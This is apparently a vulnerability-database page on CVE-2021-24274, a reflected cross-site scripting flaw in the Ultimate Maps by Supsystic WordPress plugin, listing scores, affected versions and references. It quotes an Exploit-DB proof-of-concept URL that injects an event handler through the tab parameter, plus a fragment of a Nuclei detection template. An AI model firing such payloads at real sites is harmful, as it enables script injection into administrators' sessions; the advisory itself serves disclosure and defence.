CVE-2021-24274
published 2021-05-05CVE-2021-24274: The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute…
PriorityP345medium6.1CVSS 3.1
AVNACLPRNUIRSCCLILAN
EXPLOIT
EPSS
17.64%
96.8th percentile
The Ultimate Maps by Supsystic WordPress plugin before 1.2.5 did not sanitise the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
Affected
2 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| supsystic | ultimate_maps | < 1.2.5 | 1.2.5 |
| supsystic | ultimate_maps_by_supsystic | >= 1.2.5 < 1.2.5 | 1.2.5 |
CVSS provenance
nvdv3.16.1MEDIUMCVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
nvdv2.04.3MEDIUMAV:N/AC:M/Au:N/C:N/I:P/A:N
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Exploit-DB
WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
exploitdb·2021-09-28·CVSS 6.1
CVE-2021-24274 [MEDIUM] WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
---
# Exploit Title: WordPress Plugin Ultimate Maps 1.2.4 - Reflected Cross-Site Scripting (XSS)
# Date: 3/28/2021
# Author: 0xB9
# Software Link: https://wordpress.org/plugins/ultimate-maps-by-supsystic/
# Version: 1.2.4
# Tested on: Windows 10
# CVE: CVE-2021-24274
1. Description:
The plugin did not sanitize the tab parameter of its options page before outputting it in an attribute, leading to a reflected Cross-Site Scripting issue
2. Proof of Concept:
/wp-admin/admin.php?page=ultimate-maps-supsystic&tab="+style=animation-name:rotation+onanimationstart=alert(/XSS/)//
Nuclei
WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting
nuclei·CVSS 6.1
CVE-2021-24274 [MEDIUM] WordPress Supsystic Ultimate Maps <1.2.5 - Cross-Site Scripting
WordPress Supsystic Ultimate Maps alert(document.domain)'
- type: word
part: header
words:
- "text/html"
- type: status
status:
- 200
# digest: 4a0a00473045022074aadbb05e2aa65cb1d51deb9d96447635cde7e62b1780bb4d3ec936c8877295022100f833376ea9715a3e946b9cb050b51eb0e7c17943037e087ffe3a48a465715c68:922c64590222798bb761d5b6d8e72950
No writeups or analysis indexed.
http://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1dhttp://packetstormsecurity.com/files/164316/WordPress-Ultimate-Maps-1.2.4-Cross-Site-Scripting.htmlhttps://wpscan.com/vulnerability/200a3031-7c42-4189-96b1-bed9e0ab7c1d
2021-05-05
Published